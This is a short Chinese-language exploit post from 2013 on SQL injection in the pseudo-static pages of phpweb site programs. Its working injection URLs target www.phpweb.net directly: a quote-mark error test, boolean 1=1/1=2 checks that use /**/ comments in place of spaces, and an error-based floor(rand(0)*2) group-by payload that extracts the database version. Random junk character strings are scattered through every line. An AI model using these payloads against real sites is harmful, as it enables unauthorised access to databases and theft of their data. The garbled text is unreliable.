phpweb所有的整站程序伪静态页面都存在sql注入8 I* L f# ^: ~, w/ n
9 _' G% A k O. Z主站:http://phpweb.net/
& q9 H4 u4 b# A4 w! G加’检测: W4 l: j& { j8 r5 |/ j' ~
1 Q7 j# U. S+ L: J. S& N' h; N$ ~) S
http://www.phpweb.net/down/html/?772′.html! h6 D+ P1 B( S2 w3 |: s% ?; q
3 ^6 s: R8 z& e! E j Y7 O* ~出错* q3 n* T2 Q$ W/ [+ V# p
存在注入。
; N6 f a; K+ k4 K不能用空格,只能用/*罗
; r$ b6 U m& d$ W- |, z8 \http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
- F7 S& U. s/ l" ^- K" b * Y( U8 |0 a# d: D+ i
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.3 c: F I% @* H1 k1 t
爆数据库版本:9 V6 H& G. j! o [$ X% k: A
+ m, R E3 D' L3 J6 p {; F7 r
?- ?% L/ O7 T7 Y9 Z) ]3 n$ ?
1; h+ @$ m3 j1 b H
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html, i8 E6 A; N, |
更新日期: 2013-01-03 13:39:50 n: o* N3 D, z: u6 _) `: p: G
|